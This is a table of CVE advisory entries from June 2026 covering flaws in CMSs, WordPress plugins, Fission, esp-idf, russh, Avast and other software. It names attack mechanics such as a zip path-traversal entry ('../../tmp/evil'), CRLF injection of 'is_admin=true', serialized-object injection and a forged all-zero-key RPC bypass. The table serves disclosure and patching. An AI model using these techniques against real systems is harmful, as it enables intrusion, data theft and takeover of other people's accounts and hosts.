| bludit--bludit | Bludit is a content management system. Versions prior to 3.22.0 have a Broken Access Control flaw where active sessions remain valid even after the corresponding user account has been physically deleted from the database. This "Ghost Session" allows revoked users to maintain full unauthorized access to the system. Version 3.22.0 fixes the issue. | 2026-06-08 | 8.8 | CVE-2026-46656 |
| bludit--bludit | Bludit is a content management system. Versions prior to 3.22.0 have a vulnerability in the user management logic that allows deactivated accounts to maintain access via persistent authentication tokens. When an administrator disables a user account, the application fails to invalidate or clear the associated tokenAuth and tokenRemember fields in the JSON database. Consequently, any user with a pre-existing "Remember Me" cookie can bypass the account disablement and maintain a valid authenticated state. Version 3.22.0 patches the issue. | 2026-06-08 | 7.1 | CVE-2026-46657 |
| boxlite-ai--boxlite | Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. Prior to version 0.9.0, Boxlite does not restrict the kernel capabilities available inside the container, so malicious code can remount a read-only directory in rw mode and thereby gain write access to it. This allows malicious code to perform arbitrary write operations on directories that should be read-only. This issue has been patched in version 0.9.0. | 2026-06-10 | 10 | CVE-2026-46695 |
| boxlite-ai--boxlite | Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code. Prior to version 0.9.0, Boxlite allows users to specify the OCI image used by containers in the sandbox. However, when processing tar entries in OCI images, Boxlite does not account for the possibility that entries may be symlinks pointing to absolute paths. An attacker can craft a malicious OCI image and distribute it on image hosting platforms such as DockerHub, tricking users into using it. Once a user loads the malicious image, the attacker can write arbitrary content to any path on the host, which can further lead to remote code execution on the host. This issue has been patched in version 0.9.0. | 2026-06-10 | 9.6 | CVE-2026-46703 |
| Brickcom--Cube | Brickcom cameras ship with default credentials that allows any unauthenticated remote attacker to silently access camera feeds. | 2026-06-11 | 7.7 | CVE-2026-50005 |
| Brickcom--Cube | Brickcom cameras allow unauthenticated access to live snapshot images via the /ONVIF endpoint and no authentication is required to retrieve still images from the camera feed. | 2026-06-11 | 7.7 | CVE-2026-50245 |
| BuddyPress--BuddyPress | BuddyPress 14.4.0 contains an insecure direct object reference vulnerability in the messages REST API that allows authenticated attackers to access arbitrary private message threads by supplying a user_id parameter in the request. Attackers can pass another user's identifier to the get_item_permissions_check method, which validates the supplied user_id instead of the logged-in user and is reused by the update and delete handlers, to read, reply to, or delete any user's private messages. | 2026-06-09 | 8.1 | CVE-2026-53673 |
| BuddyPress--BuddyPress | BuddyPress 14.4.0 contains a regular expression injection vulnerability in the activity mention resolver that, when username compatibility mode is enabled, allows attackers to manipulate a REGEXP database clause by crafting mention names containing regex metacharacters. Attackers can submit @mentions whose metacharacters pass through esc_sql unescaped and are inserted into an unprepared REGEXP query against the users table, enabling boolean-based inference of usernames and denial of service through catastrophic backtracking. | 2026-06-09 | 7.1 | CVE-2026-53674 |
| Cap-go--Cap-go | Cap-go prior to 12.128.2 contains an account takeover vulnerability in its email change mechanism that allows an attacker with temporary authenticated session access to change the registered email address without re-authentication such as password or MFA verification. Attackers can redirect verification to an attacker-controlled email address and subsequently perform a password reset to permanently take over the victim's account. | 2026-06-12 | 7.6 | CVE-2026-53981 |
| Capgo--Capgo | Capgo before 12.128.2 contains a denial of service vulnerability allowing attackers to register accounts using arbitrary email addresses without verification, then initiate deletion to lock emails in pending deletion state. Attackers can permanently lock legitimate users out of the platform for 30 days by exploiting unverified email ownership in account lifecycle operations. | 2026-06-12 | 7.5 | CVE-2026-53868 |
| Cellopoint--CelloOS | The SSH service of CelloOS developed by Cellopoint has an Improper Access Control vulnerability, allowing authenticated remote attackers to bypass the enforced command restrictions and execute operating system commands outside the originally authorized scope. | 2026-06-12 | 8.8 | CVE-2026-12059 |
| checkpoint--Identity Agent | A local privilege escalation vulnerability exists in Check Point Identity Agent Full for Windows OS. An authenticated local user may be able to execute arbitrary code with SYSTEM privileges due to improper handling of executable resolution during the log collection process. Successful exploitation could allow an attacker to gain elevated privileges on the affected Windows endpoint. | 2026-06-11 | 7.8 | CVE-2026-10847 |
| checkpoint--Quantum Security Gateway | A weakness in the certificate validation logic of the deprecated IKEv1 key exchange may allow an unauthenticated attacker positioned as a man-in-the-middle to bypass certificate validation in VPN site-to-site connections that use certificate-based authentication. Successful exploitation could allow interception or modification of traffic traversing the VPN tunnel. | 2026-06-08 | 7.4 | CVE-2026-50752 |
| Cloud Foundry--UAA | Cloud Foundry UAA incorrectly treated XML encryption to the Service Provider (confidentiality) as a substitute for XML signatures from the Identity Provider (authenticity) in two SAML flows: the OAuth 2.0 SAML2 bearer grant (token endpoint) and browser SSO (ACS) when wantAssertionSigned is set to false. Assertions or responses that were unsigned but contained encrypted content could still be accepted. Encryption uses the SP's public key from published metadata; therefore any party, not only a trusted IdP, can produce ciphertext that UAA can decrypt, and successful decryption does not prove that the IdP issued the message. Affected versions: Cloud Foundry UAA (uaa_release) 2.0.0 through 78.13.0. Cloud Foundry CF Deployment all versions through 56.1.0. | 2026-06-11 | 9 | CVE-2026-41005 |
| code-projects--Online Music Site | A vulnerability was found in code-projects Online Music Site 1.0. This vulnerability affects unknown code of the file /Administrator/PHP/AdminDeleteAlbum.php. The manipulation of the argument ID results in SQL injection. The attack may be performed remotely. The exploit has been made public and could be used. | 2026-06-08 | 7.3 | CVE-2026-11489 |
| code-projects--Online Music Site | A vulnerability was determined in code-projects Online Music Site 1.0. This issue affects some unknown processing of the file /Frontend/Search.php. This manipulation of the argument Category causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 7.3 | CVE-2026-11490 |
| code-projects--Simple Flight Ticket Booking System | A vulnerability has been found in code-projects Simple Flight Ticket Booking System 1.0. This affects an unknown part of the file checkUser.php of the component POST Parameter Handler. The manipulation of the argument Username leads to SQL injection. The attack can be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 7.3 | CVE-2026-11488 |
| code16--sharp | Sharp is a content management framework built for Laravel as a package. Prior to version 9.22.0, Sharp exposes a generic download endpoint that authorizes access only to the supplied Sharp entity instance, but then reads the target storage disk and path from request parameters. Because the requested storage object is not bound to the authorized entity instance, an authenticated Sharp user who can view one valid record may use that record as an authorization anchor to download unrelated disk-relative objects from configured Laravel Storage disks. The confirmed impact is authenticated disclosure of unrelated objects from configured Laravel Storage disks. This issue does not imply arbitrary host filesystem access outside configured Laravel Storage disk roots. This issue has been patched in version 9.22.0. | 2026-06-10 | 7.7 | CVE-2026-44692 |
| CodeAstro--Student Attendance Management System | A flaw has been found in CodeAstro Student Attendance Management System 1.0. The impacted element is an unknown function of the file /attendance-php/index.php. Manipulation of the argument Username can lead to SQL injection. The attack may be performed remotely. The exploit has been published and may be used. | 2026-06-08 | 7.3 | CVE-2026-11582 |
| Comma AI--Openpilot | A vulnerability was found in Comma AI Openpilot 0.11. This issue affects the function pickle.load/pickle.loads of the file selfdrive/modeld/modeld.py of the component Pickle Module. The manipulation results in deserialization. The attack is only possible with local access. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 7.8 | CVE-2026-12191 |
| commenthol--md-fileserver | md-fileserver allows for local viewing of markdown files in a browser. Prior to version 1.10.3, a cross-site scripting (XSS) vulnerability exists in the application's Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML, including <script> tags, is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain. This issue has been patched in version 1.10.3. | 2026-06-09 | 7.2 | CVE-2026-46492 |
| contrid--Newsletters | The Newsletters plugin for WordPress is vulnerable to time-based SQL Injection via the 'wpmlsubscriber_id' parameter in all versions up to, and including, 4.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-06-10 | 7.5 | CVE-2026-3018 |
| creativethemeshq--Blocksy | The Blocksy theme for WordPress is vulnerable to PHP Object Injection leading to Remote Code Execution via the 'blocksy_meta' REST API field and the V200 database migration in versions up to and including 2.1.35. This is due to insufficient input sanitization in the blocksy_sanitize_post_meta_options() function, which only blocks values containing '<' or '>' and does not prevent serialized PHP object strings from being stored in post meta, combined with the SearchReplacer::run_recursively() function unconditionally deserializing all string values via @unserialize() during migration without restricting allowed classes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a serialized Blocksy\RaiiPattern object into post meta that, when the V200 migration runs on an upgraded site, is deserialized and triggers RaiiPattern::__destruct(), which executes arbitrary PHP callables via call_user_func(). | 2026-06-09 | 8.8 | CVE-2026-8365 |
| D-Link--DCS-935L | A security vulnerability has been detected in D-Link DCS-935L 1.10.01. This issue affects the function snprintf of the file /web/cgi-bin/greece/rhea of the component HTTP Handler. Manipulation of the argument data leads to a format string vulnerability. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-06-13 | 8.8 | CVE-2026-12174 |
| Dana Powers--kafka-python | kafka-python prior to 2.3.2 contains a denial-of-service vulnerability in the protocol parser that allows a malicious broker or machine-in-the-middle attacker to exhaust memory or hang connections by sending a crafted 4-byte frame length value without bounds validation. Attackers can send a specially crafted frame length through the receive_bytes() function to trigger either a multi-gigabyte memory allocation or an uncaught ValueError that leaves the connection in a broken state, causing requests to hang and consumers to stop heartbeating until restart. | 2026-06-10 | 7.5 | CVE-2026-10142 |
| Dana Powers--kafka-python | kafka-python prior to 2.3.2 contains a denial-of-service vulnerability in SCRAM authentication handling that allows a malicious or machine-in-the-middle broker to freeze the client event loop by supplying an excessively large iteration count. In scram.py, ScramClient.process_server_first_message() passes the broker-controlled SCRAM iteration count directly to hashlib.pbkdf2_hmac() without validation, blocking producer sends, consumer polls, admin operations, and heartbeats, which can cause consumer group eviction and repeated reconnect failures. | 2026-06-10 | 7.5 | CVE-2026-10143 |
| davidanderson--UpdraftPlus: WP Backup & Migration Plugin | The UpdraftPlus: WP Backup & Migration Plugin plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.26.4 via the UpdraftPlus_Remote_Communications_V2::wp_loaded function. This is due to insufficient validation of the remote communications message format, where signature verification can be bypassed and unchecked decryption return values collapse to a predictable all-zero encryption key. This makes it possible for unauthenticated attackers to forge arbitrary RPC commands and run them as the connected administrator, such as uploading and activating a malicious plugin, which ultimately leads to remote code execution. | 2026-06-11 | 8.1 | CVE-2026-10795 |
| debevv--nanoMODBUS | nanoMODBUS through v1.23.0 contains an off-by-one buffer overflow in the recv_msg_header() function of the Modbus/TCP server that allows remote unauthenticated attackers to write one attacker-controlled byte past the end of the 260-byte receive buffer by sending a crafted MBAP frame whose Length field is set to 255. The overflow corrupts the adjacent buffer-index field of the nanoMODBUS state structure, resulting in denial of service through invalid memory accesses and, on bare-metal and RTOS targets without memory protection, one-byte information disclosure and writes to unintended register addresses on the Write Multiple Registers (FC16) handler path. | 2026-06-14 | 8.6 | CVE-2026-54410 |
| degit--degit | Versions of the package degit before 2.8.6, from 3.0.0 and before 3.3.1 are vulnerable to Command Injection due to improper sanitisation of user input for git shell commands directly invoked with exec() method by _cloneWithGit() and fetchRefs() functions. An attacker can execute arbitrary operating system commands as the process user by supplying a specially crafted git repository name. | 2026-06-09 | 8.8 | CVE-2026-11572 |
| discourse--discourse | Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.4, 2026.3.0-latest to before 2026.3.1, and 2026.4.0-latest to before 2026.4.1, chat events for public category channels are published to MessageBus without permission scoping, so any MessageBus subscriber without chat enabled could receive chat message payloads in real time. This issue has been patched in versions 2026.1.4, 2026.3.1, 2026.4.1, and 2026.5.0-latest.1. | 2026-06-12 | 7.5 | CVE-2026-44786 |
| driftregion--iso14229 | driftregion iso14229 through 0.9.0 contains an integer underflow and downstream out-of-bounds read in the Handle_0x27_SecurityAccess() function in iso14229.c that allows a remote unauthenticated attacker to crash a UDS server and potentially read memory past the receive buffer by sending a single-byte 0x27 SecurityAccess request that follows any earlier well-formed 0x27 message. The handler reads the SecurityAccess subFunction from recv_buf[1] without first checking that recv_len is at least 2, then computes the key-data length as the unsigned subtraction (uint16_t)(recv_len - UDS_0X27_REQ_BASE_LEN); when recv_len equals 1 the result underflows to 65535 and is passed as args.len to the application's SecAccessValidateKey or SecAccessRequestSeed callback, which typically iterates or copies that many bytes from the 4-KB receive buffer. Every other UDS sub-function handler in the library (0x10, 0x11, 0x14, 0x19, 0x22, 0x23, 0x28, and others) performs an explicit recv_len lower-bound check before indexing; Handle_0x27_SecurityAccess is the sole outlier. The vulnerable handler reaches over CAN bus, OBD-II, ISO-TP, and DoIP transports and is exposed in the default diagnostic session without prior authentication; deployments on automotive ECUs, industrial controllers, and IoT devices that ship iso14229 as their UDS server are affected. | 2026-06-14 | 8.2 | CVE-2026-54413 |
| DTStack--Taier | A vulnerability was determined in DTStack Taier up to 1.4.0. The affected element is the function preHandle of the file taier-data-develop/src/main/java/com/dtstack/taier/develop/interceptor/LoginInterceptor.java of the component Source Connection Test Endpoint. Manipulation can lead to improper authentication. The attack may be performed remotely. The exploit has been publicly disclosed and may be utilized. The fix is identified by commit f95389e7f74acec42bcee079a616aaa06f9551d2; applying this patch is recommended to remediate the issue. | 2026-06-09 | 7.3 | CVE-2026-11618 |
| emarket-design--Customer Support Ticket System & Helpdesk | The WP Ticket plugin for WordPress is vulnerable to SQL Injection via the WordPress search query parameter (`s`) in versions up to, and including, 6.0.4. The plugin hooks WordPress's `posts_request` filter with `wp_ticket_com_posts_request()`, which calls `emd_author_search_results()` when the current request is an unauthenticated front-end search. That function reads `$query->query_vars['s']` (already wp_unslash()'d by `WP_Query::parse_query()`, so the wp_magic_quotes protection has been stripped) and concatenates the raw value into a SQL `LIKE` clause inside a UNION sub-SELECT appended to the main query, with no `$wpdb->prepare()` or escaping. This makes it possible for unauthenticated attackers to append additional SQL queries into already-existing queries that can be used to extract sensitive information from the database. | 2026-06-13 | 7.5 | CVE-2026-9848 |
| espressif--esp-idf | ESP-IDF is the Espressif Internet of Things (IoT) Development Framework. In versions 5.5.4 and 6.0, the esp_tee component exposes secure-service wrappers in esp_secure_services.c and esp_secure_services_iram.c that bridge calls from the user application (i.e. the REE) to TEE-protected hardware peripherals (AES, SHA, ECC, HMAC, SPI, MMU, WDT) and to security features such as attestation, OTA updates, and secure storage. This issue has been patched in versions 5.5.5 and 6.0.1. | 2026-06-10 | 9.3 | CVE-2026-45328 |
| espressif--esp-idf | ESP-IDF is the Espressif Internet of Things (IoT) Development Framework. In versions 5.5.4 and 6.0, several ESP-TEE secure-service wrappers in esp_secure_services.c and esp_secure_services_iram.c validated only some of the caller-supplied pointer arguments, leaving input pointer arguments unchecked. Because the underlying TEE-protected hardware peripherals (e.g., ECC, SHA, SPI) run in RISC-V machine mode (M-mode) with full address-space access, a caller could supply pointers into TEE-exclusive memory as inputs, causing the peripheral to read TEE memory and return results derived from it to the REE. Depending on the wrapper, the result contains raw bytes from TEE memory, a computed function of TEE memory recoverable through repeated calls, or a single bit per call that forms an oracle for incremental disclosure of TEE-resident sensitive data. This issue has been patched in versions 5.5.5 and 6.0.1. | 2026-06-10 | 7.1 | CVE-2026-45329 |
| espressif--esp-idf | ESP-IDF is the Espressif Internet of Things (IoT) Development Framework. In versions 5.2.6, 5.3.5, 5.4.4, 5.5.4, and 6.0, a NULL-pointer dereference exists in the WebSocket subprotocol-negotiation path of the esp_http_server component. While parsing the client-supplied Sec-WebSocket-Protocol request header during the WebSocket handshake, the tokenisation result is dereferenced without a NULL check, so a malformed header value can crash the server before any application-level authentication runs. This issue has been patched in versions 5.2.7, 5.3.6, 5.4.5, 5.5.5, and 6.0.1. | 2026-06-10 | 7.5 | CVE-2026-45541 |
| espressif--esp-idf | ESP-IDF is the Espressif Internet of Things (IoT) Development Framework. In versions 5.2.6, 5.3.5, 5.4.4, 5.5.4, and 6.0, a heap buffer overflow exists in the Security Scheme 2 (SRP6a) session-setup path of the protocomm component. The first-phase handler (handle_session_command0() in components/protocomm/src/security/security2.c) trusts the length of a client-supplied protobuf field for the SRP6a username and copies it into a buffer whose size is derived from a narrower destination type. The resulting truncation-versus-copy asymmetry corrupts the heap when an oversized value is supplied. This issue has been patched in versions 5.2.7, 5.3.6, 5.4.5, 5.5.5, and 6.0.1. | 2026-06-10 | 7.1 | CVE-2026-45542 |
| Eugeny--russh | Russh is a Rust SSH client & server library. Prior to version 0.60.3, CryptoVec used unchecked capacity growth, unchecked length arithmetic, and unsafe allocation/locking paths. In current russh releases, local SSH agent peers could still feed attacker-controlled frame lengths into buffer growth before validation. In older russh releases before 0.58.0, remote SSH traffic also reached CryptoVec through transport and compression buffers. This issue has been patched in version 0.60.3. | 2026-06-10 | 7.5 | CVE-2026-46673 |
| Eugeny--russh | Russh is a Rust SSH client & server library. From version 0.34.0 to before version 0.61.1, when SSH compression is enabled, russh accepted compressed packets whose on-wire size passed the normal transport packet-length checks but whose decompressed size was much larger. This allowed a remote peer to send oversized post-decompression packets that should have been rejected. In current releases, this is a remote denial-of-service / resource-exhaustion issue in the post-decompression receive path. In older releases before 0.58.0, the same remote decompression path used CryptoVec, which appears to make the historical impact worse. This issue has been patched in version 0.61.1. | 2026-06-10 | 7.5 | CVE-2026-46702 |
| Eugeny--russh | Russh is a Rust SSH client & server library. From version 0.34.0 to before version 0.61.0, several russh client and server message handlers decoded attacker-controlled SSH strings, name-lists, and byte fields into owned allocations before applying field-specific bounds. A remote SSH peer could send oversized, high-fanout, or malformed length-prefixed fields and make the library allocate, attempt to allocate, or split data before rejecting input that should have been rejected earlier. This issue has been patched in version 0.61.0. | 2026-06-10 | 7.5 | CVE-2026-48110 |
| EvWill--Product Catalog 8 | Product Catalog 8 1.2 plugin for WordPress contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the selectedCategory parameter. Attackers can submit POST requests to the admin-ajax.php endpoint with the UpdateCategoryList action to extract sensitive database information from WordPress tables. | 2026-06-09 | 8.2 | CVE-2016-20065 |
| fedify-dev--fedify | Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Fedify previously addressed SSRF/internal network access in GHSA-p9cg-vqcc-grcx by adding public URL validation before runtime document and media fetching. However, the IPv4 validation logic present starting in version 0.11.2 and prior to versions 1.9.12, 1.10.11, 2.0.19, 2.1.15, and 2.2.4 appears incomplete. The `validatePublicUrl()` protection relies on `isValidPublicIPv4Address()` to reject non-public IPv4 destinations. The function blocks common private and local ranges such as `10.0.0.0/8`, `127.0.0.0/8`, `169.254.0.0/16`, `172.16.0.0/12`, and `192.168.0.0/16`, but it still treats several special-use, reserved, multicast, benchmarking, and carrier-grade NAT IPv4 ranges as valid public destinations. Because this validation is used as an SSRF defense before outbound fetches, this appears to be an incomplete mitigation or bypass class for the previous SSRF issue. Versions 1.9.12, 1.10.11, 2.0.19, 2.1.15, and 2.2.4 contain an updated patch. | 2026-06-10 | 8.6 | CVE-2026-50131 |
| fedify-dev--fedify | Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.9.11, 1.10.10, 2.0.18, 2.1.14, and 2.2.3, an attacker can make use of JSON-LD features to restructure a JSON-LD document that would change how Fedify interprets it without changing its Linked Data Signature, allowing them to alter a third-party signed activity they have received. Versions 1.9.11, 1.10.10, 2.0.18, 2.1.14, and 2.2.3 fix the issue. | 2026-06-10 | 7 | CVE-2026-42462 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.23.0, the Fission router registers an internal-style route (/fission-function/<name> and /fission-function/<ns>/<name>) for every Function object, independent of whether any HTTPTrigger exists for that function. The route was mounted on the same listener as user-defined HTTPTriggers (svc/router, port 8888), so any caller who could reach the router could invoke any function by guessing its metadata.name (and namespace), bypassing the host / path / method / method-allow-list restrictions encoded in HTTPTrigger objects. This issue has been patched in version 1.23.0. | 2026-06-10 | 9.8 | CVE-2026-46614 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, the Environment.spec.runtime.podSpec / spec.builder.podSpec passthrough lacked validation, and MergePodSpec propagated dangerous fields into the generated pods. This issue has been patched in version 1.24.0. | 2026-06-10 | 9.9 | CVE-2026-50545 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, Fission's Container Executor path lets a tenant supply Function.spec.podspec directly; the executor merges it into the executor-built podspec and creates a Deployment whose pods run the user's container image. This issue has been patched in version 1.24.0. | 2026-06-10 | 9.9 | CVE-2026-50563 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, Fission's Environment CRD exposes spec.runtime.podSpec and spec.builder.podSpec, which are merged into the Kubernetes pod specs for runtime and builder pods. The merge logic propagated hostNetwork, hostPID, hostIPC, container privileged, and serviceAccountName from the user-supplied podspec with no filtering, and Environment.Validate performed no security-relevant checks on these fields. This issue has been patched in version 1.24.0. | 2026-06-10 | 9.9 | CVE-2026-50564 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, a tenant with environments.fission.io create/update RBAC can run privileged / allowPrivilegeEscalation / dangerous-capability containers in the Fission function or builder namespace, scheduled under the executor's high-privilege service account - enabling container-sandbox escape, host filesystem and network access, and potential node- and cluster-level compromise. This issue has been patched in version 1.24.0. | 2026-06-10 | 9.9 | CVE-2026-50566 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.23.0, the Fission storagesvc component registers archive CRUD handlers (/v1/archive GET / POST / DELETE and /v1/archives list) directly on its HTTP router without performing any authentication or authorization. Any caller able to reach the storagesvc ClusterIP - including any other workload in the same Kubernetes cluster - could enumerate archive IDs, download archives belonging to other tenants, upload arbitrary archive content, and delete archives. This issue has been patched in version 1.23.0. | 2026-06-10 | 8.8 | CVE-2026-46612 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, the Fission Function admission webhook (pkg/webhook/function.go) validated that spec.secrets[].namespace and spec.configmaps[].namespace equalled the function's own namespace but performed no equivalent check on spec.environment.namespace. This issue has been patched in version 1.24.0. | 2026-06-10 | 8.5 | CVE-2026-49824 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.25.0, Fission added PodSpec safety validation for tenant-facing Environment and Function CRDs (ValidatePodSpecSafety / ValidateContainerSafety admission webhook + sanitizeContainerSecurityContext executor merge layer), but the capability check was implemented as a fixed denylist of six Linux capabilities (SYS_ADMIN, NET_ADMIN, SYS_PTRACE, SYS_MODULE, DAC_READ_SEARCH, DAC_OVERRIDE). The denylist omitted CAP_SYS_TIME, among others. As a result, a tenant who could create a Function or Environment CRD could request securityContext.capabilities.add: ["SYS_TIME"], pass Fission's admission validation and merge-layer sanitization, and run attacker-controlled code with CAP_SYS_TIME in the resulting function or runtime container. This issue has been patched in version 1.25.0. | 2026-06-10 | 8.5 | CVE-2026-50570 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, Fission's buildermgr controller processed Package CRDs without verifying that Package.spec.environment.namespace matched Package.metadata.namespace. This issue has been patched in version 1.24.0. | 2026-06-10 | 7.7 | CVE-2026-49821 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, a low-privilege developer who could create a KubernetesWatchTrigger (KWT) in their own namespace was able to establish a persistent surveillance channel over any other namespace. This issue has been patched in version 1.24.0. | 2026-06-10 | 7.7 | CVE-2026-49822 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, a Fission Function spec carries three reference types - Secret, ConfigMap, and Package. The first two were namespace-validated by the admission webhook; PackageRef.Namespace was not. This issue has been patched in version 1.24.0. | 2026-06-10 | 7.7 | CVE-2026-49823 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.25.0, Unarchive in pkg/utils/zip.go joined each archive entry name with the destination directory via filepath.Join and wrote the result without checking whether the resolved path stayed under the destination. A zip entry named ../../tmp/evil therefore landed at /tmp/evil. An attacker who could control a Package.Spec.Source.URL or Deployment.URL archive could induce the fetcher (running as the per-environment pod's fission-fetcher sidecar) to write files anywhere that process could reach: into other tenants' /packages/<ns>/ directories, into mounted secret/config volumes, or into the fetcher's own binary. This issue has been patched in version 1.25.0. | 2026-06-10 | 7.7 | CVE-2026-50567 |
| Flux159--mcp-server-kubernetes | mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Prior to version 3.6.0, mcp-server-kubernetes exposes three environment variables (ALLOW_ONLY_READONLY_TOOLS, ALLOW_ONLY_NON_DESTRUCTIVE_TOOLS, ALLOWED_TOOLS) documented as access controls for restricting which Kubernetes operations are available. These controls are enforced at the tool discovery layer (tools/list) but not at the execution layer (tools/call). Any client that knows a tool name can invoke it directly regardless of the configured restriction mode. The access control was effectively cosmetic. This issue has been patched in version 3.6.0. | 2026-06-11 | 8.8 | CVE-2026-46519 |
| foliovision--FV Flowplayer Video Player | The FV Flowplayer Video Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the comment text in all versions up to, and including, 7.5.49.7212 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires an administrator to have enabled the non-default 'Parse Vimeo and YouTube links' (parse_comments) plugin setting, and requires a submitted comment to be approved by an administrator before the payload is publicly delivered. | 2026-06-09 | 7.2 | CVE-2026-7556 |
| form-data--form-data | form-data is a library for creating readable multipart/form-data streams. In versions through 4.0.5, the `field` argument to `FormData#append` and the `filename` option are concatenated verbatim into the `Content-Disposition` header without escaping carriage return (CR), line feed (LF), or double-quote (") characters. An application that passes attacker-controlled data as a field name or filename (for example, an API gateway that turns JSON object keys into multipart field names) allows the attacker to terminate the header line and inject additional headers, or to smuggle entire additional multipart parts, into the request the application forwards to a backend. This can let the attacker add or override form fields (e.g. set `is_admin=true`) seen by the downstream parser. This is an instance of CWE-93 (CRLF injection). The fix escapes CR, LF, and `"` as `%0D`, `%0A`, and `%22` in field names and filenames, matching the serialization browsers use per the WHATWG HTML multipart/form-data encoding algorithm. Exploitation requires the consuming application to use untrusted input as a field name or filename; applications that use only fixed/trusted field names are not affected. Fixed in 2.5.6, 3.0.5, and 4.0.6. | 2026-06-12 | 7.5 | CVE-2026-12143 |
| Fortinet--FortiSandbox | An improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox 4.2 all versions, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow an unauthenticated attacker to execute unauthorized commands via specifically crafted HTTP requests. | 2026-06-09 | 9.1 | CVE-2026-25089 |
| GALAYOU--Y4 | A vulnerability was determined in GALAYOU Y4 1.0.0. Impacted is an unknown function of the component Web Server. This manipulation causes buffer overflow. The attack is only possible within the local network. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 8.8 | CVE-2026-12192 |
| garlic-signage--garlic-hub | Garlic-Hub manages digital signage network - devices, content, and playlists - from a single self-hosted interface. Prior to version 1.1, authenticated users can cause the server to issue arbitrary HTTP requests to internal services via the uploadFromUrl endpoint. This allows internal port scanning, service fingerprinting, and retrieval of internal HTTP responses which are stored in the publicly accessible media pool. This issue has been patched in version 1.1. | 2026-06-11 | 7.7 | CVE-2026-47170 |
| Gen Digital--Avast Antivirus | Heap buffer out-of-bounds write vulnerability in Avast Antivirus when scanning a malformed Windows PE file may allow Local Execution of Code or Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25040308. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 7.8 | CVE-2025-7004 |
| Gen Digital--Avast Antivirus | Heap buffer out-of-bounds read vulnerability in Avast Antivirus when scanning a malformed Windows PE file with .NET metadata may allow Local Execution of Code or Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25021310. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 7.8 | CVE-2025-7008 |
| Gen Digital--Avast Antivirus | Heap buffer out-of-bounds read vulnerability in Avast Antivirus when scanning a malformed Windows PE file may allow Local Execution of Code or Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds before VPS 25021310. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 7.8 | CVE-2025-7009 |
